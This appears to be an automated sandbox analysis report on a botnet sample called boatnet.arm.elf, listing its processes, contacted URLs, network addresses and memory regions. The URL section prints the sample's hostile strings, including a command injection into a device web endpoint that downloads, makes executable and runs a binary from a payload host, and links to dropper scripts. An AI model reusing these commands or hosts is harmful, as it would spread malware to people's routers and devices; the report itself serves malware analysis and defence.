Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/usr/bin/dash
|
-
|
||
|
/usr/bin/rm
|
rm -f /tmp/tmp.T57bWDrZlL /tmp/tmp.AEK9TqvHiM /tmp/tmp.dIqLqxXnTy
|
||
|
/usr/bin/dash
|
-
|
||
|
/usr/bin/rm
|
rm -f /tmp/tmp.T57bWDrZlL /tmp/tmp.AEK9TqvHiM /tmp/tmp.dIqLqxXnTy
|
||
|
/tmp/boatnet.arm.elf
|
/tmp/boatnet.arm.elf
|
||
|
/tmp/boatnet.arm.elf
|
-
|
||
|
/tmp/boatnet.arm.elf
|
-
|
||
|
/tmp/boatnet.arm.elf
|
-
|
||
|
/tmp/boatnet.arm.elf
|
-
|
||
|
/tmp/boatnet.arm.elf
|
-
|
||
|
/tmp/boatnet.arm.elf
|
-
|
||
|
/tmp/boatnet.arm.elf
|
-
|
||
|
/tmp/boatnet.arm.elf
|
-
|
||
|
/tmp/boatnet.arm.elf
|
-
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://5.181.159.16/wget.sh;
|
unknown
|
||
|
http://5.181.159.16/idk/home.arm7;chmod
|
unknown
|
||
|
http://5.181.159.16/c.sh;
|
unknown
|
||
|
http://127.0.0.1/cgi-bin/ViewLog.asp
|
169.191.161.204
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://127.0.0.1:80/shell?cd+/tmp;+wget+http:/\/5.181.159.16/idk/home.arm;+chmod+777+home.arm;+./home.arm
|
2.87.255.185
|
||
|
http://127.0.0.1:52869/wanipcn.xml
|
2.112.173.200
|
||
|
http://5.181.159.16/idk/home.mips;
|
unknown
|
||
|
http://5.181.159.16/idk/home.x86
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/envelope/
|
unknown
|
||
|
http://127.0.0.1:52869/picdesc.xml
|
2.110.95.15
|
||
|
http://127.0.0.1:7547/UD/act?1
|
182.168.243.189
|
||
|
http://upx.sf.net
|
unknown
|
||
|
http://5.181.159.16/w.sh;
|
unknown
|
||
|
http://5.181.159.16/idk/home.mips
|
unknown
|
There are 5 hidden URLs, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
43.145.117.225
|
unknown
|
Japan
|
||
|
12.204.194.63
|
unknown
|
United States
|
||
|
86.88.75.239
|
unknown
|
Netherlands
|
||
|
104.24.135.127
|
unknown
|
United States
|
||
|
41.143.104.33
|
unknown
|
Morocco
|
||
|
89.40.18.151
|
unknown
|
Romania
|
||
|
188.0.0.5
|
unknown
|
Russian Federation
|
||
|
181.254.185.110
|
unknown
|
Colombia
|
||
|
195.88.196.68
|
unknown
|
Russian Federation
|
||
|
80.153.239.29
|
unknown
|
Germany
|
||
|
164.58.177.242
|
unknown
|
United States
|
||
|
164.85.77.201
|
unknown
|
Brazil
|
||
|
14.237.49.1
|
unknown
|
Viet Nam
|
||
|
83.168.87.186
|
unknown
|
Poland
|
||
|
217.80.95.157
|
unknown
|
Germany
|
||
|
188.107.45.142
|
unknown
|
Germany
|
||
|
195.151.118.151
|
unknown
|
Russian Federation
|
||
|
169.222.46.99
|
unknown
|
Korea Republic of
|
||
|
221.14.249.35
|
unknown
|
China
|
||
|
116.120.112.251
|
unknown
|
Korea Republic of
|
||
|
59.245.6.31
|
unknown
|
China
|
||
|
164.179.190.250
|
unknown
|
United States
|
||
|
43.223.172.175
|
unknown
|
Japan
|
||
|
89.32.119.53
|
unknown
|
Spain
|
||
|
84.139.209.169
|
unknown
|
Germany
|
||
|
80.146.226.54
|
unknown
|
Germany
|
||
|
112.1.60.4
|
unknown
|
China
|
||
|
59.178.48.144
|
unknown
|
India
|
||
|
95.54.216.135
|
unknown
|
Russian Federation
|
||
|
82.72.6.182
|
unknown
|
Netherlands
|
||
|
83.148.36.127
|
unknown
|
Czech Republic
|
||
|
164.38.17.237
|
unknown
|
United Kingdom
|
||
|
80.97.224.164
|
unknown
|
Romania
|
||
|
111.64.192.26
|
unknown
|
Japan
|
||
|
213.60.85.234
|
unknown
|
Spain
|
||
|
171.56.59.62
|
unknown
|
India
|
||
|
213.133.37.165
|
unknown
|
Netherlands
|
||
|
88.107.85.160
|
unknown
|
United Kingdom
|
||
|
83.123.190.159
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
|
164.85.190.95
|
unknown
|
Brazil
|
||
|
140.168.85.34
|
unknown
|
Australia
|
||
|
80.2.133.183
|
unknown
|
United Kingdom
|
||
|
94.147.13.240
|
unknown
|
Denmark
|
||
|
4.166.191.110
|
unknown
|
United States
|
||
|
2.36.96.229
|
unknown
|
Italy
|
||
|
61.125.29.188
|
unknown
|
Japan
|
||
|
195.237.41.56
|
unknown
|
Finland
|
||
|
169.18.199.23
|
unknown
|
United States
|
||
|
178.87.239.158
|
unknown
|
Saudi Arabia
|
||
|
1.255.77.112
|
unknown
|
Korea Republic of
|
||
|
83.164.155.56
|
unknown
|
Austria
|
||
|
213.132.8.102
|
unknown
|
Denmark
|
||
|
112.132.41.178
|
unknown
|
China
|
||
|
164.85.77.216
|
unknown
|
Brazil
|
||
|
181.170.30.236
|
unknown
|
Argentina
|
||
|
105.177.118.35
|
unknown
|
South Africa
|
||
|
195.68.23.41
|
unknown
|
United Kingdom
|
||
|
122.228.1.197
|
unknown
|
China
|
||
|
100.41.200.155
|
unknown
|
United States
|
||
|
164.225.163.150
|
unknown
|
United States
|
||
|
197.123.112.54
|
unknown
|
Egypt
|
||
|
86.145.254.175
|
unknown
|
United Kingdom
|
||
|
66.21.84.217
|
unknown
|
United States
|
||
|
89.75.137.94
|
unknown
|
Poland
|
||
|
169.27.168.114
|
unknown
|
United States
|
||
|
196.34.155.8
|
unknown
|
South Africa
|
||
|
195.166.150.2
|
unknown
|
United Kingdom
|
||
|
83.30.248.218
|
unknown
|
Poland
|
||
|
189.150.62.45
|
unknown
|
Mexico
|
||
|
83.238.167.59
|
unknown
|
Poland
|
||
|
37.21.121.155
|
unknown
|
Russian Federation
|
||
|
2.61.255.147
|
unknown
|
Russian Federation
|
||
|
116.193.124.243
|
unknown
|
Japan
|
||
|
80.48.107.217
|
unknown
|
Poland
|
||
|
5.157.47.105
|
unknown
|
Estonia
|
||
|
188.194.192.24
|
unknown
|
Germany
|
||
|
193.136.188.200
|
unknown
|
Portugal
|
||
|
80.254.55.102
|
unknown
|
Russian Federation
|
||
|
78.166.117.160
|
unknown
|
Turkey
|
||
|
181.103.242.241
|
unknown
|
Argentina
|
||
|
181.119.17.2
|
unknown
|
Argentina
|
||
|
122.213.163.160
|
unknown
|
Japan
|
||
|
181.121.115.254
|
unknown
|
Paraguay
|
||
|
213.107.91.112
|
unknown
|
United Kingdom
|
||
|
86.253.232.58
|
unknown
|
France
|
||
|
82.27.197.21
|
unknown
|
United Kingdom
|
||
|
195.45.166.32
|
unknown
|
Italy
|
||
|
172.127.235.130
|
unknown
|
United States
|
||
|
89.226.163.187
|
unknown
|
France
|
||
|
178.121.229.14
|
unknown
|
Belarus
|
||
|
206.182.227.27
|
unknown
|
United States
|
||
|
182.253.246.112
|
unknown
|
Indonesia
|
||
|
50.144.231.20
|
unknown
|
United States
|
||
|
25.54.3.104
|
unknown
|
United Kingdom
|
||
|
164.75.16.132
|
unknown
|
Australia
|
||
|
80.124.112.74
|
unknown
|
France
|
||
|
80.248.90.16
|
unknown
|
Russian Federation
|
||
|
109.163.11.80
|
unknown
|
Norway
|
||
|
190.104.7.13
|
unknown
|
Bolivia
|
||
|
169.178.43.168
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f660802f000
|
page execute read
|
 |
||
|
7f6710c27000
|
page read and write
|
|||
|
7f671127f000
|
page read and write
|
|||
|
7f6710c04000
|
page read and write
|
|||
|
7f6708021000
|
page read and write
|
|||
|
56390de82000
|
page execute read
|
|||
|
7ffdc7e86000
|
page read and write
|
|||
|
7f6711156000
|
page read and write
|
|||
|
5639100f1000
|
page read and write
|
|||
|
7f670fd9d000
|
page read and write
|
|||
|
7f67112e8000
|
page read and write
|
|||
|
7f6710d93000
|
page read and write
|
|||
|
7f6710637000
|
page read and write
|
|||
|
7f6707fff000
|
page read and write
|
|||
|
56390e0dc000
|
page read and write
|
|||
|
7f67112a3000
|
page read and write
|
|||
|
56390e0d3000
|
page read and write
|
|||
|
56391160d000
|
page read and write
|
|||
|
7f6710999000
|
page read and write
|
|||
|
7f6710f75000
|
page read and write
|
|||
|
7f6608031000
|
page read and write
|
|||
|
7ffdc7fd8000
|
page execute read
|
|||
|
5639100da000
|
page execute and read and write
|
|||
|
7f67105a5000
|
page read and write
|
There are 14 hidden memdumps, click here to show them.